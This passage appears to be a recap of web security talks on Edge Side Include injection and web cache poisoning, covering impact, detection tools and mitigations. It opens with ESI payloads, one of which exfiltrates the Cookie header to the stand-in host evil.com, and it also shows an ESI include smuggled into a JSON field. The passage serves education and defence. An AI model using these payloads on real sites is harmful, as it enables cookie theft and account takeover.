<esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> 

<!-- Exfiltrate 'Cookie' header -->
<img src="//evil.com/<esi:vars>
          $(HTTP_HEADER{Cookie})
  </esi:vars>">

Impact: ESII can steal cookies (even those with the HttpOnly flag) and headers, likely enabling an attacker to do full account takeovers. It can also be used for SSRF, defacing, header injection, and in the right context even RCE.

Louis walks through an example of examining Oracle’s Web Cache 11g.

Detection: You can use tools like the Burp Active Scan++ or Upload Scanner plugins, Acunetix, or Qualys.

Mitigation: You can encode HTML entities, but overall the fix can be tricky because very few ESI implementations can differentiate between a JSON and HTML response. So you may be encoding HTML entities in HTML responses, but what if an attacker puts an ESI include tag in a JSON response?

{
  "username": "attacker",  
  "fullname": "<esi:include src=intranet/status />"
}
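One possible approach for JSON responses, sketched below in Python, is to emit angle brackets as JSON unicode escapes so that no literal `<esi:` tag appears in the response body. This is an assumption on my part rather than a fix from the talk, and it relies on the ESI parser not decoding JSON escapes; `dumps_esi_safe` is a hypothetical helper.

```python
import json


def dumps_esi_safe(obj) -> str:
    """Serialize to JSON with < and > written as \\u003c and \\u003e."""
    text = json.dumps(obj)
    # In valid JSON, angle brackets can only occur inside strings,
    # so replacing them with unicode escapes keeps the JSON equivalent.
    return text.replace("<", "\\u003c").replace(">", "\\u003e")
```

JSON clients decode the escapes back to the original characters, so the API's consumers see the same data while the cache server sees no tag to parse.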

For more details, see Louis’ detailed blog post: Beyond XSS: Edge Side Include Injection.

Web Cache Poisoning

Web cache poisoning was documented in August 2018 by James Kettle in his BlackHat USA talk (blog post). It leverages unsafe/unknown usage of HTTP headers coupled with caching.

Modern caches key their entries on several properties, not just the path/filename, as the same path may return different content (e.g. based on requested language, encoding headers, etc.)

Cache Me: Poisoning Overview
If the X-Forwarded-Host header overrides the content of the Host header and the Host header is used to specify the domain in the link (http://foo), then your self-XSS might get cached by the server, affecting the next user to request index.php. Thus, the web cache is your XSS delivery mechanism.
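The scenario above can be simulated in a few lines of Python. This toy model assumes an origin that prefers `X-Forwarded-Host` when building links and a cache that keys only on `Host` and path; both `origin_render` and `NaiveCache` are made up for illustration.

```python
def origin_render(headers: dict) -> str:
    """Toy origin: builds a link from X-Forwarded-Host, falling back to Host."""
    host = headers.get("X-Forwarded-Host", headers["Host"])
    return f'<a href="http://{host}/">home</a>'


class NaiveCache:
    """Toy cache keyed on (Host, path); X-Forwarded-Host is NOT in the key."""

    def __init__(self):
        self.store = {}

    def fetch(self, path: str, headers: dict) -> str:
        key = (headers["Host"], path)
        if key not in self.store:
            # Cache miss: the attacker's unkeyed header shapes the stored copy.
            self.store[key] = origin_render(headers)
        return self.store[key]
```

If the attacker's request (with `X-Forwarded-Host: evil.example`) is the one that populates the cache, the next visitor to the same path gets the poisoned response even though their own request was benign.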

The X-Forwarded-Host header is used to tell the origin server which “Host” was requested by the client. There are tons of similar headers used by applications, and most are secret. However, you can use OSINT and brute forcing to discover them.

Impact: XSS, DoS, and more!

James Kettle’s Burp extension Param Miner can be used to identify hidden, unlinked parameters, and is particularly useful for finding web cache poisoning vulnerabilities.